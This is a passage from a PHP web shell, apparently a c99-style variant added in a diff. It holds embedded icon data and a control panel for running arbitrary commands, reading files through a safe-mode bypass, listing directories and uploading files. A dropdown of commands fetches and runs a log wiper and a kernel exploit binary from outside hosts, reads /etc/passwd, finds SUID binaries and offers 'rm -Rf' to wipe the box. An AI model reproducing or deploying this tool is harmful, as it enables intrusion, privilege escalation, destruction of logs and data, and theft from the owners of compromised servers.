+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
+"up"=> 
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
+"write"=> 
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
+"ext_asp"=> 
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
+"ext_mp3"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
+"ext_avi"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
+"ext_cgi"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
+"RYtMAgEAOw==", 
+"ext_cmd"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
+"dmrYAMn1onq/YKpjvEgAADs=", 
+"ext_cpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
+"Eq7YrLDE7a4SADs=", 
+"ext_ini"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
+"SnEjgPVarHEHgrB43JvszsQEADs=", 
+"ext_diz"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
+"Ow==", 
+"ext_doc"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
+"ext_exe"=> 
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
+"xhIAOw==", 
+"ext_h"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
+"Wq/NknbbSgAAOw==", 
+"ext_hpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
+"UqUagnbLdZa+YFcCADs=", 
+"ext_htaccess"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
+"AAA7", 
+"ext_html"=> 
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
+"ADs=", 
+"ext_jpg"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"FxEAOw==", 
+"ext_js"=> 
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
+"a00AjYYBbc/o9HjNniUAADs=", 
+"ext_lnk"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
+"ADs=", 
+"ext_log"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
+"ext_php"=> 
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
+"ext_pl"=> 
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
+"ext_swf"=> 
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
+"ext_tar"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
+"u4tLAgEAOw==", 
+"ext_txt"=> 
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
+"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
+"ext_wri"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
+"ext_xml"=> 
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7" 
+ ); 
+ //For simple size- and speed-optimization. 
+ $imgequals = array( 
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
+  "ext_html"=>array("ext_html","ext_htm"), 
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
+  "ext_lnk"=>array("ext_lnk","ext_url"), 
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
+  "ext_doc"=>array("ext_doc","ext_dot"), 
+  "ext_js"=>array("ext_js","ext_vbs"), 
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
+  "ext_wri"=>array("ext_wri","ext_rtf"), 
+  "ext_swf"=>array("ext_swf","ext_fla"), 
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
+ ); 
+ if (!$getall) 
+ { 
+  header("Content-type: image/gif"); 
+  header("Cache-control: public"); 
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
+  header("Cache-control: max-age=".(60*60*24*7)); 
+  header("Last-Modified: ".date("r",filemtime(__FILE__))); 
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
+  if (empty($images[$img])) {$img = "small_unk";} 
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
+  echo base64_decode($images[$img]); 
+ } 
+ else 
+ { 
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
+  natsort($images); 
+  $k = array_keys($images); 
+  echo  "<center>"; 
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
+  echo "</center>"; 
+ } 
+ exit; 
+} 
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+?> 
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Useful Commands  
+    </div> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+        <input type=hidden name=act value="cmd"> 
+        <input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+          <SELECT NAME="cmd"> 
+            <OPTION VALUE="uname -a">Kernel version 
+              <OPTION VALUE="w">Logged in users 
+                <OPTION VALUE="lastlog">Last to connect 
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins 
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! 
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? 
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders? 
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO 
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports 
+                    <OPTION VALUE="locate gcc">gcc installed? 
+                    <OPTION VALUE="rm -Rf">Format box (DANGEROUS) 
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) 
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 
+                    <OPTION VALUE="./zap2">WIPELOGS PT3 
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) 
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) 
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) 
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) 
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) 
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) 
+                  </SELECT> 
+        <input type=hidden name="cmd_txt" value="1"> 
+        &nbsp; 
+        <input type=submit name=submit value="Execute"> 
+          <br> 
+        Warning. Kernel may be alerted using higher levels </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> 
+      <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type="hidden" name="client" value="firefox-a"> 
+      <input type="hidden" name="rls" value="org.mozilla:en-US:official"> 
+      <input type="hidden" name="hl" value="en"> 
+      <input type="hidden" name="hs" value="b7p"> 
+      <input type=submit name="btnG" VALUE="Search"> 
+    </form></center> 
+    </td> 
+</tr></TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Php Safe-Mode Bypass (Read Files) 
+    </div><br> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> 
+       
+       
+       
+            
+       
+       
+      <? 
+       
+      function rsg_read()
+    {    
+    $test="";
+    $temp=tempnam($test, "cx");
+    $file=$_GET['file'];    
+    $get=htmlspecialchars($file);
+    echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+    if(copy("compress.zlib://".$file, $temp)){
+    $fichier = fopen($temp, "r");
+    $action = fread($fichier, filesize($temp));
+    fclose($fichier);
+    $source=htmlspecialchars($action);
+    echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+    unlink($temp);
+    } else {
+    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+    <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+    access.</CENTER></FONT>");
+            }
+    echo "</div>";
+    } 
+     
+    if(isset($_GET['file']))
+{
+rsg_read();
+} 
+     
+    ?> 
+     
+    <? 
+     
+    function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+    echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+} 
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+} 
+
+?> 
+
+          <br> 
+      </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"> 
+      <div align="center"><br> 
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> 
+
+    </form></center> 
+    </td> 
+</tr></TABLE> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; 